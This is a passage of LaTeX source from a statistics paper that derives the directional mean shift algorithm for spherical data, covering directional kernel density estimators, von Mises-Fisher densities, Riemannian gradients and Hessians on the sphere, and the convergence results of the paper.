To address the aforementioned challenges, we consider the idea of kernel smoothing because the kernel density estimator (KDE; \citealt{Rosenblatt1956, Parzen1962}) in the Euclidean data setting is highly successful. Its statistical properties have been well-studied \citep{All_nonpara2006,Scott2015,KDE_t}, and the local modes of a Euclidean KDE are often good estimators of the local modes of the underlying density function \citep{Parzen1962, Romano1988, vieu1996note,Mode_clu2016}.
Moreover, in Euclidean KDEs, there is an elegant algorithm known as the \emph{mean shift} algorithm
\citep{MS1975,MS1995,MS2002,carreira2015review}
that allows us to numerically obtain the local modes at a low cost.
\begin{figure}
\centering
\includegraphics[width=0.9\linewidth]{Figures/MS_TripMode_MC_affi.pdf}
\caption{Clustering of directional data using the proposed directional mean shift algorithm (Algorithm~\ref{Algo:MS}). Additional details of the simulated data can be found in Section~\ref{sec:spherical}.}
\label{fig:Mode_clu_Example}
\end{figure}
Although kernel smoothing has been applied to directional data since the seminal work of \cite{KDE_Sphe1987}
and other studies have been conducted on analyzing its performance as a density estimator \citep{KDE_direct1988, Zhao2001,Exact_Risk_bw2013, ley2018applied},
little is known about the behavior of the derivatives of a directional KDE. To the best of our knowledge,
\cite{KLEMELA2000} was the only work to examine the derivatives of a particular type of directional KDE; however, their estimators are rarely used in practice.
Thus, the statistical properties of the gradient system induced by a general directional KDE and the resulting local modes are still open problems.
Computationally, the standard mean shift algorithm was first generalized to directional data setting by \cite{Multi_Clu_Gene2005}. Using the directional mean shift algorithm, we are able to determine the local modes of the directional KDE and perform mode clustering (mean shift clustering) of spherical data. Figure~\ref{fig:Mode_clu_Example} presents an example of mode clustering with our proposed algorithm. However, the algorithmic rate of convergence of the mean shift algorithm with directional data remains unclear. We address this problem by viewing the directional mean shift algorithm as a special case of gradient ascent methods on the $q$-dimensional unit sphere $\Omega_q = \big\{\bm{x} \in \mathbb{R}^{q+1}: \norm{\bm{x}}_2^2 = x_1^2+ \cdots + x_{q+1}^2=1 \big\}$ and develop some linear convergence results for the general gradient ascent method on $\Omega_q$.
\textbf{\emph{Notation}.} Bold-faced variables (e.g., $\bm{x}, \bm{\mu}$) represent vectors, while capitalized (bold-faced) variables (e.g., $\bm{X}_1,...,\bm{X}_n$) denote random variables (or random vectors). The set of real numbers is denoted by $\mathbb{R}$, while the unit $q$-dimensional sphere embedded in $\mathbb{R}^{q+1}$ is denoted by $\Omega_q$. The norm $\norm{\cdot}_2$ is the usual Euclidean norm (or so-called $L_2$-norm) in $\mathbb{R}^d$ for some positive integer $d$. The directional density is denoted by $f$ unless otherwise specified, and the probability of a set of events is denoted by $\mathbb{P}$. If a random vector $\bm{X}$ is distributed as $f(\cdot)$, the expectations of functions of $\bm{X}$ are denoted by $\mathbb{E}_f$ or $\mathbb{E}$ when the underlying distribution function is clear. We use the big-O notation $h(x)=O(g(x))$ if the absolute value of $h(x)$ is upper bounded by a positive constant multiple of $g(x)$ for all sufficiently large $x$. In contrast, $h(x)=o(g(x))$ when $\lim_{x\to\infty} \frac{|h(x)|}{g(x)}=0$. For random vectors, the notation $o_P(1)$ is short for a sequence of random vectors that converges to zero in probability. The expression $O_P(1)$ denotes a sequence that is bounded in probability. Additional details of stochastic $o$ and $O$ symbols can be found in Section 2.2 of \cite{VDV1998}.
The notation $a_n \asymp b_n$ indicates that $\frac{a_n}{b_n}$ has lower and upper bounds away from zero and infinity, respectively.
\textbf{\emph{Main results}.}
\begin{enumerate}
\item We revisit the mean shift algorithm with directional data (Algorithm~\ref{Algo:MS}) and provide some new insights on its iterative formula, which can be expressed in terms of the total gradient of the directional KDE (Sections~\ref{Sec:MS_Dir} and \ref{Sec:grad_Hess_Dir}).
\item From the perspective of statistical learning theory, we establish uniform convergence rates of the gradient and Hessian of the directional KDE (Theorem~\ref{pw_conv_tang} and \ref{unif_conv_tang}).
\item Moreover, we derive the asymptotic properties of estimated local modes around the true (population) local modes (Theorem~\ref{Mode_cons}).
\item With regard to computational learning theory, we prove the ascending and converging properties of the directional mean shift algorithm (Theorems~\ref{MS_asc} and \ref{MS_conv}).
\item In addition, we prove that the directional mean shift algorithm converges linearly to an estimated local mode under suitable initialization (Theorem~\ref{Linear_Conv_GA}).
\item We demonstrate the applicability of the directional mean shift algorithm by using it as a clustering method on both simulated and real-world data sets (Section~\ref{Sec:Experiments}).
\end{enumerate}
\textbf{\emph{Related work}.}
The directional KDE has a long history in statistics since the work of \cite{KDE_Sphe1987}. Its statistical convergence rates and asymptotic distributions have been studied by \cite{KDE_direct1988, Zhao2001}.
In addition, \cite{KDE_Sphe1987,KDE_direct1988,Exact_Risk_bw2013,Dir_Linear2013} considered the problem of selecting the smoothing bandwidth of directional KDEs.
A study by \cite{KLEMELA2000} was the first to estimate the derivatives of a directional density.
More generally, \cite{hendriks1990,pelletier2005,berry2017} considered the nonparametric density estimation on (Riemannian) manifolds (with boundary). The uniform convergence rate and asymptotic results of the KDE on Riemannian manifolds have also been investigated in \cite{henry2009,jiang2017,kim2019uniform}. As the unit hypersphere $\Omega_q$ is a $q$-dimensional manifold with constant curvature and positive reach \citep{federer1959}, their analyses and results are applicable to the directional KDE.
The standard mean shift algorithm with Euclidean data is a popular approach to various tasks such as clustering \citep{MS1975}, image segmentation \citep{MS2002}, and object tracking \citep{Kernel_Based_Ob2003}; see a comprehensive review in \cite{carreira2015review}. Its convergence properties have been well-studied in \cite{MS1995,MS2007_pf,MS_onedim2013,MS2015_Gaussian,Ery2016,wang2016}.
The algorithmic convergence rates of mean shift algorithms with Gaussian and Epanechnikov kernels are generally linear, except for some extreme values of the bandwidth \citep{MS_EM2007,huang2018convergence}. It can be improved to be superlinear by dynamically updating the data set for estimating the density \citep{Acc_Dy_MS2006}. There are other methods to accelerate the mean shift algorithm by combining stochastic optimization with blurring or random sampling \citep{Fast_GBMS2006,GBMS2008, Stoc_GKD_Mode_seek2009,Fast_MS2016}. The mean shift algorithm with directional data was studied by \cite{Multi_Clu_Gene2005,DMS_topology2010,vMF_MS2010,MSBC_Dir2010,MSBC_Cir2012,MSC_Dir2014} in the last two decades. More generally, \cite{tuzel2005simultaneous,subbarao2006nonlinear,Nonlinear_MS_man2009,Intrinsic_MS2009,Semi_Intrinsic_MS2012,ashizawa2017least} proposed their mean shift algorithms on manifolds using logarithmic and exponential maps, heat kernel, or direct log-density estimation via least squares. These mean shift algorithms on general manifolds are applicable to directional data, though they are more complicated than our interested method.
\textbf{\emph{Outline}.}
The remainder of the paper is organized as follows. Section~\ref{Sec:Prelim} reviews some background knowledge on directional KDEs and differential geometry, while Section~\ref{Sec:MS_Dir} provides a detailed derivation of the mean shift algorithm with directional data.
Section \ref{Sec:grad_Hess_consist} focuses on the statistical learning theory of the directional KDE; we
formulate the gradient and Hessian estimators of directional KDEs and establish their pointwise and uniform consistency results
as well as a mode consistency theory.
Section \ref{Sec:Algo_conv} considers the computational learning theory of the directional mean shift algorithm;
we study the ascending and converging properties of the algorithm.
Simulation studies and applications to real-world data sets are unfolded in Section~\ref{Sec:Experiments}. Proofs of theorems and technical lemmas are deferred to Appendix~\ref{Appendix:proofs}. All the code for our experiments is available at \url{https://github.com/zhangyk8/DirMS}.
\section{Preliminaries}
\label{Sec:Prelim}
This section is devoted to a brief review of the directional KDE and some technical concepts of differential geometry on $\Omega_q$.
\subsection{Kernel Density Estimation with Directional Data} \label{sec::KDE}
Let $\bm{X}_1,...,\bm{X}_n \in \Omega_q\subset\mathbb{R}^{q+1}$ be a random sample generated from the underlying directional density function $f$ on $\Omega_q$ with $\int_{\Omega_q} f(\bm{x}) \, \omega_q(d\bm{x})=1$,
where $\omega_q$ is the Lebesgue measure on $\Omega_q$. A well-known fact about the surface area of $\Omega_q$ is that
\begin{equation}
\label{surf_area}
\bar{\omega}_q\equiv \omega_q\left(\Omega_q \right) = \frac{2\pi^{\frac{q+1}{2}}}{\Gamma(\frac{q+1}{2})} \quad \text{ for any integer } q\geq 1,
\end{equation}
where $\Gamma$ is the Gamma function defined as $\Gamma(z)=\int_0^{\infty} x^{z-1} e^{-x} dx$ with the real part of the complex integration variable $z$ (if applicable) being positive.
The directional KDE at point $\bm{x}\in \Omega_q$ is often written as \citep{KDE_Sphe1987,KDE_direct1988,Exact_Risk_bw2013}:
\begin{equation}
\hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right),
\label{Dir_KDE}
\end{equation}
where $L$ is a directional kernel (a rapidly decaying function with nonnegative values and defined on $(-\delta_L,\infty) \subset \mathbb{R}$ for some constant $\delta_L >0$)\footnote{Normally, the kernel $L$ is only required to be defined on $[0,\infty)$. We extend its domain to $(-\delta_L,\infty) \subset \mathbb{R}$ so that the usual derivatives of $\hat{f}_h$ can be defined in $\mathbb{R}^{q+1}$ or at least a small neighborhood around $\Omega_q$ in $\mathbb{R}^{q+1}$ under some mild conditions on $L$. See Section~\ref{Diff_Geo_Review} and condition (D2') in Section~\ref{Sec:Consist_Assump} for details.}, $h>0$ is the bandwidth parameter, and $c_{h,q}(L)$ is a normalizing constant satisfying
\begin{equation}
\label{asym_norm_const}
c_{h,q}(L)^{-1} = \int_{\Omega_q} L\left(\frac{1-\bm{x}^T \bm{y}}{h^2} \right) \omega_q(d\bm{y}) =h^q \lambda_{h,q}(L) \asymp h^q \lambda_q(L)
\end{equation}
with $\lambda_{h,q}(L) = \bar{\omega}_{q-1} \int_0^{2h^{-2}} L(r) r^{\frac{q}{2}-1} (2-rh^2)^{\frac{q}{2}-1} dr$ and $\lambda_q(L) = 2^{\frac{q}{2}-1} \bar{\omega}_{q-1} \int_0^{\infty} L(r) r^{\frac{q}{2}-1} dr$; see (a) of Lemma~\ref{integ_lemma} in Appendix~\ref{Appendix:Thm2_pf} for details.
As in Euclidean kernel smoothing, bandwidth selection is a critical component in determining the performance of directional KDEs. There is extensive literature \citep{KDE_Sphe1987,KDE_direct1988,Auto_bw_cir2008,KDE_torus2011,Oliveira2012,Exact_Risk_bw2013,Nonp_Dir_HDR2020} that investigates various reliable bandwidth selection mechanisms. On the contrary, kernel selection is less crucial, and a popular candidate is the so-called von Mises kernel $L(r) = e^{-r}$. Its name originates from the famous $q$-von Mises-Fisher (vMF) distribution on $\Omega_q$, which is denoted by $\text{vMF}(\bm{\mu}, \nu)$ and has the density
\begin{equation}
\label{vMF_density}
f_{\text{vMF}}(\bm{x};\bm{\mu},\nu) = C_q(\nu) \cdot \exp(\nu \bm{\mu}^T \bm{x}) \quad \text{ with } \quad C_q(\nu) = \frac{\nu^{\frac{q-1}{2}}}{(2\pi)^{\frac{q+1}{2}} \mathcal{I}_{\frac{q-1}{2}}(\nu)},
\end{equation}
where $\bm{\mu} \in \Omega_q$ is the directional mean, $\nu \geq 0$ is the concentration parameter, and
$$\mathcal{I}_{\alpha}(\nu) = \frac{\left(\frac{\nu}{2} \right)^{\alpha}}{\pi^{\frac{1}{2}} \Gamma\left(\alpha +\frac{1}{2} \right)} \int_{-1}^1 (1-t^2)^{\alpha -\frac{1}{2}} \cdot e^{\nu t} dt$$
is the modified Bessel function of the first kind of order $\nu$. See Figure~\ref{fig:vMF_density} for contour plots of a von Mises-Fisher density and a mixture of von Mises-Fisher densities on $\Omega_2$, respectively.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\begin{subfigure}[t]{.5\textwidth}
\centering
\includegraphics[width=0.9\linewidth]{Figures/vMF_density1.pdf}
\caption{$f_{\text{vMF},2}(\bm{x};\bm{\mu}, \nu)$ with $\bm{\mu}=(0,0,1)$ and $\nu=4.0$}
\end{subfigure}%
\hspace{1em}
\begin{subfigure}[t]{.5\textwidth}
\centering
\includegraphics[width=0.9\linewidth]{Figures/vMF_dst_Mix.pdf}
\caption{$\frac{2}{5}\cdot f_{\text{vMF},2}(\bm{x};\bm{\mu}_1, \nu_1) + \frac{3}{5} \cdot f_{\text{vMF},2}(\bm{x};\bm{\mu}_2, \nu_2)$ \\ with $\bm{\mu}_1=(0,0,1), \bm{\mu}_2=(1,0,0)$,\\ and $\nu_1=\nu_2=5.0$}
\end{subfigure}
\caption{Contour plots of a 2-von Mises-Fisher density and a mixture of 2-vMF densities}
\label{fig:vMF_density}
\end{figure}
Using the von-Mises kernel, the directional KDE in (\ref{Dir_KDE}) becomes a mixture of $q$-von Mises-Fisher densities as follows:
$$\hat{f}_h(\bm{x}) = \frac{1}{n} \sum_{i=1}^n f_{\text{vMF}}\left(\bm{x};\bm{X}_i, \frac{1}{h^2} \right)=\frac{1}{n(2\pi)^{\frac{q+1}{2}} \mathcal{I}_{\frac{q-1}{2}}(1/h^2) h^{q-1}} \sum_{i=1}^n \exp\left(\frac{\bm{x}^T\bm{X}_i}{h^2} \right).$$
For a more detailed discussion of the statistical properties of the von Mises-Fisher distribution and directional KDE, we refer the interested reader to \cite{Mardia2000directional,spherical_EM,pewsey2021recent}.
\subsection{Gradient and Hessian on a Sphere}
\label{Diff_Geo_Review}
For a function defined on a manifold, its gradient and Hessian are defined through the tangent space of the manifold. Whereas the formal definitions of the gradient and Hessian on a general manifold are often involved (see Appendix~\ref{sec::GH}), their representations are simple when the manifold is a (hyper)sphere $\Omega_q$.
Let $T_{\bm x} \equiv T_{\bm x}(\Omega_q)$ be the tangent space of the sphere $\Omega_q$ at point ${\bm x}\in \Omega_q$.
For the sphere $\Omega_q$, the tangent space has a simple representation in the ambient space $\mathbb{R}^{q+1}$ as follows:
\begin{equation}
T_{\bm x} \simeq \left\{\bm{v}\in \mathbb{R}^{q+1}: \bm{x}^T\bm{v}=0 \right\},
\label{tangent_new}
\end{equation}
where $V_1 \simeq V_2$ signifies that the two vector spaces are isomorphic. In what follows, the expression $\bm{v}\in T_{\bm x}$ indicates that $\bm{v}$ is a vector tangent to $\Omega_q$ at $\bm{x}$.
A \emph{geodesic} on $\Omega_q$ is a non-constant, parametrized curve $\gamma: [0,1] \to \Omega_q$ of constant speed and (locally) minimum length between two points on $\Omega_q$. It can be represented by part of a great circle on the sphere $\Omega_q$.
For a smooth function $f: \Omega_q\to \mathbb{R}$, its differential in the (tangent) direction $\bm{v} \in T_{\bm x}$ with $\norm{\bm{v}}_2=1$ at point $\bm{x}\in\Omega_q$ is defined as follows.
We first define a geodesic curve $\alpha: (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$.
Then the differential (at $\bm x$) $df_{\bm{x}}:T_{\bm x}\rightarrow \mathbb{R}$
is given by
\begin{equation}
df_{\bm{x}}(\bm{v}) = \frac{d}{dt} f(\alpha(t)) \Big|_{t=0}.
\label{differential}
\end{equation}
With this, the \emph{Riemannian gradient} $\mathtt{grad}\, f(\bm x)\in T_{\bm x}\subset \mathbb{R}^{q+1}$ is defined as
\begin{equation}
df_{\bm{x}}(\bm{v}) =\langle \mathtt{grad}\, f(\bm x), \bm{v}\rangle= \bm v^T \mathtt{grad}\, f(\bm x).
\label{grad_new}
\end{equation}
The Riemannian Hessian $\mathcal{H} f(\bm x)\in T_{\bm x} \times T_{\bm x}$ is the second derivative of $f$ within the tangent space $T_{\bm x}$. We characterize its matrix representation as follows.
Let ${\bm v},{\bm u}\in T_{\bm x}\subset\mathbb{R}^{q+1}$ be two unit vectors inside the tangent space $T_{\bm x}$.
We consider two geodesic curves
$\alpha,\beta : (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0) = \beta(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$ and $\beta'(0) = {\bm u}$.
We define a second-order differential as
$$d^2f_{\bm{x}}(\bm{v}, \bm{u}) = \frac{d}{dt} df_{\beta(t)}\left(\alpha'(t) \right)\Big|_{t=0}$$
and the \emph{Riemannian Hessian} $\mathcal{H} f(\bm x)$ is a $(q+1)\times (q+1)$ matrix satisfying
\begin{equation}
d^2f_{\bm{x}}(\bm{v}, \bm{u}) = \langle\mathtt{grad}\, \langle \mathtt{grad}\, f, \bm{v}\rangle(\bm x) , \bm{u}\rangle= \bm v^T \mathcal{H} f(\bm x) \bm u
\label{hess_new}
\end{equation}
and belongs to $T_{\bm x} \times T_{\bm x}$.
To ensure that $\mathcal{H} f(\bm x)$ belongs to $T_{\bm x} \times T_{\bm x}$,
it has to satisfy
\begin{equation}
\mathcal{H} f(\bm x) = (I_{q+1}-\bm x \bm x^T)\mathcal{H} f(\bm x) = \mathcal{H} f(\bm x) (I_{q+1} - \bm x \bm x^T),
\label{projection}
\end{equation}
where $I_{q+1}$ is the $(q+1)\times (q+1)$ identity matrix and $(I_{q+1}-\bm x \bm x^T)$ is a projection matrix onto the tangent space $T_{\bm x}$.
Note that $d^2f_{\bm{x}}(\bm{v}, \bm{u}) = d^2f_{\bm{x}}(\bm{u}, \bm{v})$ can be easily verified.
Although \eqref{grad_new} and \eqref{hess_new} define the Riemannian gradient and Riemannian Hessian on a sphere,
it is unclear how they are related to the total gradient operator $\nabla$, where $\nabla g(\bm x)\in\mathbb{R}^{q+1}$ and the $\ell$-th component is
$$[\nabla g(\bm x)]_\ell = \frac{d g(\bm x)}{dx_\ell}$$
for any differentiable function $g:\mathbb{R}^{q+1}\rightarrow \mathbb{R}$.
Whereas the total gradient $\nabla$ cannot be applied to a directional density (because it is only supported on $\Omega_q$),
the directional KDE $\hat f_h$ is well-defined outside of $\Omega_q$ (after smoothly extending the domain of the kernel $L$ from $[0,\infty)$ to $\mathbb{R}$), and
its total gradient $\nabla \hat f_h(\bm x) \in\mathbb{R}^{q+1}$ can be defined for any point $\bm x\in \mathbb{R}^{q+1}$.
\begin{figure}
\centering
\includegraphics[width=0.8\linewidth]{Figures/grad_sphe2.pdf}
\caption{Visualization of a differential of the directional density $f$ on the unit sphere and its gradient}
\label{fig:grad_proj}
\end{figure}
To associate the total gradient with the Riemannian gradient, we consider the following construction. Assume tentatively that $f$ is well-defined and smooth in $\mathbb{R}^{q+1}\backslash\{\bm 0\}$, not limited to $\Omega_q$.
In this case, $\nabla f(\bm x)$ is well-defined $\mathbb{R}^{q+1}\backslash\{\bm 0\}$ and all subsequent derivations can also be applied to the directional KDE $\hat f_h$.
For any point $\bm{x} \in \Omega_q$ and unit vector $\bm{v} \in T_{\bm{x}}$, we define a geodesic curve $\alpha: (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$. Then, a differential of $f$ at $\bm{x}\in \Omega_q$ is a linear map characterized by
\begin{equation*}
df_{\bm{x}}(\bm{v}) = \frac{d}{dt} f(\alpha(t)) \Big|_{t=0} = \nabla f(\alpha(t))^T \alpha'(t) \Big|_{t=0} = \nabla f(\bm{x})^T \alpha'(0) = \nabla f(\bm{x})^T \bm{v}
\end{equation*}
for any given $\bm{v} \in T_{\bm{x}}$. Thus, by the definition of the Riemannian gradient in \eqref{grad_new},
$$
df_{\bm{x}}(\bm{v}) = {\bm v}^T \mathtt{grad}\, f({\bm x}) = \nabla f(\bm{x})^T \bm{v} = \mathtt{Tang}\left(\nabla f(\bm{x})\right)^T \bm{v},$$
and we conclude that
\begin{equation}
\mathtt{grad}\, f({\bm x}) \equiv \mathtt{Tang}\left(\nabla f(\bm{x}) \right) = \left(I_{q+1}-\bm{x}\bm{x}^T \right)\nabla f(\bm{x}),
\label{tangent}
\end{equation}
which is the tangent component of the total gradient $\nabla f(\bm{x})$.
That is, the Riemannian gradient is the same as the tangent component of the total gradient.
In addition, we can define the radial component of the total gradient as
\begin{equation}
\mathtt{Rad}(\nabla f(\bm{x})) = \nabla f(\bm{x}) - \mathtt{Tang}\left(\nabla f(\bm{x}) \right) = \bm{x}\bm{x}^T \nabla f(\bm{x}).
\label{radial}
\end{equation}
See Figure~\ref{fig:grad_proj} for a graphical illustration.
In the same context, we use the fact that $\alpha''(0) = -\bm x$ for the geodesic curve $\alpha$ and deduce that for any unit vector $\bm v\in T_{\bm x}\subset\mathbb{R}^{q+1}$,
\begin{align}
\label{Hess_curve}
\begin{split}
\bm v^T\mathcal{H} f(\bm x) \bm v &= \frac{d^2}{dt^2} f(\alpha(t)) \Big|_{t=0}\\
&= \frac{d}{dt} \left[\nabla f(\alpha(t))^T \alpha'(t) \right]\Big|_{t=0}\\
&\left(= \left[\sum_{i=1}^{q+1} \sum_{j=1}^{q+1} \frac{\partial^2 }{\partial x_i \partial x_j} f(\alpha(t)) \cdot \alpha_i'(t)\alpha_j'(t) + \sum_{i=1}^{q+1} \frac{\partial}{\partial x_i} f(\alpha(t)) \cdot \alpha_i''(t) \right]\Bigg|_{t=0}
\right)\\
&= \alpha'(0)^T \nabla\nabla f(\alpha(0)) \alpha'(0) + \nabla f(\alpha(0))^T \alpha''(0)\\
&= \bm{v}^T \nabla\nabla f(\bm{x}) \bm{v} + \nabla f(\bm{x})^T \alpha''(0)\\
&= \bm{v}^T (\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \bm x I_{q+1}) \bm{v}.
\end{split}
\end{align}
One may conjecture that $(\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \alpha''(0))$ is
the Riemannian Hessian matrix.
However, it does not satisfy the projection condition in Equation \eqref{projection}.
To this end, we select
\begin{equation}
\label{Hess_Dir}
\mathcal{H} f(\bm x) = (I_{q+1} - \bm{x}\bm{x}^T) \left[\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \bm{x} I_{q+1} \right](I_{q+1} - \bm{x}\bm{x}^T).
\end{equation}
One can verify that the Hessian matrix in \eqref{Hess_Dir}
satisfies both \eqref{hess_new} and \eqref{projection};
thus, it characterizes the relationship between the Riemannian Hessian and total gradient operator. More importantly, the Hessian matrix in \eqref{Hess_Dir} is indeed the Riemannian Hessian on $\Omega_q$. Detailed definitions of Riemannian Hessians can be found in Section 2 and 4.2 of \cite{Extrinsic_Look_Riem_Manifold}.
\section{Mean Shift Algorithm with Directional Data}
\label{Sec:MS_Dir}
In this section, we present a detailed derivation of the mean shift algorithm with directional data. Given the directional KDE $\hat{f}_h(\bm{x})$ in \eqref{Dir_KDE}, \cite{vMF_MS2010,MSC_Dir2014} introduced a Lagrangian multiplier to maximize $\hat{f}_h(\bm{x})$ under the constraint $\bm{x}^T\bm{x}=1$ and derived the directional mean shift algorithm. To make a better comparison with the standard mean shift algorithm with Euclidean data, we provide an alternative derivation.
Given a Euclidean KDE of the form $\hat{p}_n(\bm{x}) = \frac{c_{k,d}}{nh^d} \sum\limits_{i=1}^n k\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)$ with a differentiable kernel profile $k:[0,\infty) \to [0,\infty)$, its (total) gradient has the following decomposition:
\begin{equation}
\label{KDE_grad_Euclidean}
\nabla \hat{p}_n(\bm{x}) = \underbrace{\frac{2c_{k,d}}{nh^{d+2}} \left[\sum_{i=1}^n g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right) \right]}_{\text{term 1}} \underbrace{\left[\frac{\sum_{i=1}^n \bm{X}_i g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)} -\bm{x}\right]}_{\text{term 2}},
\end{equation}
where $g(x)=-k'(x)$ is the derivative of the selected kernel profile. As noted by \cite{MS2002}, the first term is proportional to the density estimate at $\bm{x}$ with the ``kernel'' $G(\bm{x})=c_{g,d}\cdot g(\norm{\bm{x}}_2^2)$, and the second term is the so-called \emph{mean shift} vector, which points toward the direction of maximum increase in the density estimator $\hat{p}_n$.
Thus, the standard mean shift algorithm with Euclidean data translates each query point according to the corresponding mean shift vector, which leads to a converging path to a local mode of $\hat{p}_n$ under some conditions \citep{MS2007_pf,MS2015_Gaussian,Ery2016}.
The key insight in our derivation of the directional mean shift algorithm is the following alternative representation of the directional KDE as:
\begin{equation}
\label{Dir_KDE2}
\tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right),
\end{equation}
given a directional random sample $\bm{X}_1,...,\bm{X}_n \in \Omega_q$. Recall that the original directional KDE in \eqref{Dir_KDE} is $\hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum\limits_{i=1}^n L\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right). $
Both $\hat f_h$ and $\tilde f_h$ can be defined on any point in $\mathbb{R}^{q+1}\backslash \{\bm 0\}$.
Although $\hat f_h(\bm{x}) \neq \tilde f_h(\bm{x})$ for $\bm{x}\notin \Omega_q$, their function values are identical on the sphere; that is,
\begin{equation}
\hat f_h(\bm{x}) = \tilde f_h(\bm{x}),\quad \forall \bm{x}\in \Omega_q
\label{equiv}
\end{equation}
due to the fact that
$\frac{1}{2}\norm{\bm{x}-\bm{X}_i}_2^2 = 1-\bm{x}^T\bm{X}_i$ for any $\bm{x}\in \Omega_q$.
Since the two directional KDEs are the same on $\Omega_q$,
either of them can be used to express our density estimator.
The power of the expression $\tilde{f}_h$ is that its total gradient has a similar decomposition as the total gradient of the Euclidean KDE (cf. \eqref{KDE_grad_Euclidean}):
\begin{align}
\label{Dir_KDE_grad}
\begin{split}
\nabla \tilde{f}_h(\bm{x}) &= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n (\bm{x} -\bm{X}_i) \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) \\
&= \underbrace{\frac{c_{h,q}(L)}{nh^2} \left[\sum_{i=1}^n -L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) \right]}_{\text{term 1}} \cdot \underbrace{\left[\frac{\sum_{i=1}^n \bm{X}_i \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)} -\bm{x}\right]}_{\text{term 2}}.
\end{split}
\end{align}
Similar to the density gradient estimator with Euclidean data (cf. Equation~\eqref{KDE_grad_Euclidean}), the first term of the product in (\ref{Dir_KDE_grad}) can be viewed as a proportional form of the directional density estimate at $\bm{x}$ with ``kernel'' $G(r) = -L'(r)$:
\begin{align}
\label{prod1}
\begin{split}
\tilde{f}_{h,G}(\bm{x}) &= \frac{c_{h,q}(G)}{n} \sum_{i=1}^n -L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) = \frac{c_{h,q}(G)}{n} \sum_{i=1}^n -L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)
\end{split}
\end{align}
given that $-L'(r)$ is non-negative on $[0,\infty)$. Some commonly used kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$, easily satisfy this condition. The second term of the product in (\ref{Dir_KDE_grad}) is indeed the \emph{directional mean shift} vector
\begin{equation}
\label{mean_shift}
\Xi_h(\bm{x}) =\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)} -\bm{x}= \frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)}{\sum_{i=1}^n L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)} -\bm{x},
\end{equation}
which is the difference between a weighted sample mean with weights $\frac{L'\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right)}{\sum\limits_{i=1}^n L'\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right)}$, $i=1,...,n$, and $\bm{x}$, the current query point of the directional density estimation. It is worth mentioning that these weights are strictly positive when the von-Mises kernel $L(r)=e^{-r}$ is applied. From Equations (\ref{prod1}) and (\ref{mean_shift}), the total gradient estimator at $\bm{x}$ becomes
$$\nabla \tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{c_{h,q}(G) h^2} \cdot \tilde{f}_{h,G}(\bm{x}) \cdot \Xi_h(\bm{x}),$$
yielding
$$\Xi_h(\bm{x}) = \frac{c_{h,q}(G) h^2}{c_{h,q}(L)} \cdot \frac{\nabla \tilde{f}_h(\bm{x})}{\tilde{f}_{h,G}(\bm{x})}.$$
As is illustrated in \eqref{tangent}, the total gradient of the directional KDE at $\bm{x}$, $\nabla \tilde{f}_h(\bm{x})$, becomes the Riemannian gradient of $\tilde{f}_h(\bm{x})=\hat{f}_h(\bm{x})$ on $\Omega_q$ after being projected onto the tangent space $T_{\bm{x}}$. This suggests that the directional mean shift vector $\Xi_h(\bm{x})$, which is parallel to the total gradient of $\tilde{f}_h$ at $\bm{x}$, points in the direction of maximum increase in the estimated density $\tilde{f}_h$ after being projected onto the tangent space $T_{\bm{x}}$.
However, due to the manifold structure of $\Omega_q$, translating a point $\bm{x} \in \Omega_q$ in the mean shift direction $\Xi_h(\bm{x})$ deviates the point from $\Omega_q$.
We thus project the translated point $\bm x+\Xi_h(\bm{x})$ onto $\Omega_q$ by a simple standardization: $\bm x+\Xi_h(\bm{x}) \mapsto \frac{\bm x+\Xi_h(\bm{x})}{\norm{\bm x+\Xi_h(\bm{x})}_2}$.
In summary, starting at point $\bm x$, the directional mean shift algorithm moves this point to a new location $\frac{\bm x+\Xi_h(\bm{x})}{\norm{\bm x+\Xi_h(\bm{x})}_2}$.
This movement creates a path leading to a local mode of the estimated directional density under suitable conditions (Theorems \ref{MS_asc} and \ref{MS_conv}).
\begin{algorithm}[t]
\caption{Mean Shift Algorithm with Directional Data}
\label{Algo:MS}
\begin{algorithmic}
\State \textbf{Input}:
\begin{itemize}
